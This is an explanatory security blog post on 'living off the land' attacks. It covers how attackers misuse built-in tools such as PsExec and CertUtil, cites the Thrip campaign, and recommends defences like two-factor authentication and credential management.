Every company’s security provisions and network structures are multi-layered. A hacker gaining unauthorised access to one area of the network doesn’t necessarily mean they can steal data or affect operations in another.
However, in some situations an attacker is able to take the resources that they initially gain access to, primarily operating system features or network administrator tools, and use them to extend their infiltration. More and more, attackers are leveraging machine identities to hijack machine-to-machine connections and communications to move laterally through a network.
This is known as living off the land (LotL) and it is a growing problem for cybersecurity experts. In this post we explain how LotL attacks are carried out, how they can be identified and what you can do to mitigate the problem.
Any intrusion that involves a malicious attacker deploying a network’s own tools against it to extend the attack has elements of a LotL approach.
Such attacks are sometimes described as fileless or zero-footprint attacks as they don't require the installation of malware from an external source. This makes them very difficult for antivirus tools to detect accurately as there are no indicators of outside connections, data exchange or interference.
LotL attacks can also be highly effective. The Ponemon Institute's State of Endpoint Security Risk Report found that fileless attacks are about ten times more likely to succeed than file-based attacks.
A living off the land attack usually follows three stages:
Gaining entry – while companies increasingly optimize security to guard against malware, less attention is sometimes paid to securing remote access systems. A company’s Virtual Private Network (VPN) or other remote access solution can be used by a wide range of internal and external stakeholders, including third-party contractors, and be a critical vulnerability when not properly secured.
Moving laterally – once inside a network an attacker living off the land will then use credentials, systems, and tools they have identified and accessed within it to move to other areas. This may be done by simply accessing new directories and data, or by setting up fake administrator accounts in order to change network settings.
Data theft and network damage – once they have access to the tools, permissions and directories needed the attacker can then carry out their malicious purpose. This will often be some form of personal data theft or operational disruption.
Symantec states that attackers who are living off the land will usually use one of four approaches:
Dual-use tools – hijacking of tools that are used to manage networks and systems which give the attacker the ability to traverse networks, run commands, steal data and even download additional programs or malware. Examples are File Transfer Protocol (FTP) clients or system functions such as PsExec, a Microsoft Sysinternals tool that is used for the execution of processes on other systems.
Fileless persistence – a form of attack in which a malicious infection can remain on the system after a reboot even though it wasn't loaded on to the hard disk. This is usually performed by storing malicious scripts in the Windows Registry—such as changes associated with Visual Basic Scripting (VBS).
Memory only threats – in which the harmful payload is executed directly in the memory. This is a well-established form of attack; in 2001 the memory only Code-Red worm infected a large number of systems through a vulnerability in Microsoft's IIS webserver for example.
Attacks may involve activities in one or more of these categories and there have been a number of combined threats identified over the years.
One of the major living off the land attacks occurred in January 2018. It was found that a large telecommunications operator in Southeast Asia had been infiltrated by attackers who were using internal tools and systems to avoid detection.
Once the system vulnerability and attackers’ behaviour pattern had been noticed it was then identified at several other companies in the region, including businesses in the communication, defence and even satellite operations sectors.
The hackers, who became known as Thrip, were attempting to remotely install the malware Infostealer.Catchamas without tipping off system security personnel about their presence and activity.
Such behaviour is another hallmark of an LotL attack. While moving and navigating within the network, using its own tools and functions, attackers will try to carry out “normal” activities in order to remain undetected for as long as possible. This can often mean that attacks aren’t spotted for weeks or even months.
The first line of defence is to limit the possibility of illicit access to the network. it is important that two-factor authentication and effective credential management is in place on all VPNs and remote access systems.
A sophisticated approach to overseeing user and machine identities will narrow the attack vector for malicious actors—making it harder for them to gain access and move laterally in the network.
Companies with lost or compromised keys and certificates are particularly at risk. Stolen keys and login credentials can give attackers initial access to otherwise private and encrypted areas.
Attackers have also exploited system features that help manage certificates. For example, the Windows program CertUtil (used to download and update certificates) has been exploited by attackers who have used it to download additional malicious payloads once they have enticed users to open compromised files
The ability to analyse and monitor identity creation and use will also make it more likely that the behaviour of an infiltrator will be spotted in the first place (remember that attackers living off the land usually behave in ways that make it hard to identify the attack).
In addition, ensuring that data exchange between tools and system functions inside the network are effectively encrypted will also limit the damage an attacker can do if they do get inside undetected.
Ultimately, an attacker who is living off the land has a finite set of resources available; the tools and systems they can access once they’ve infiltrated a network. By limiting which of the potentially harmful features they can access and what they are able to do with them, a LotL attack can hopefully be identified and stopped much faster.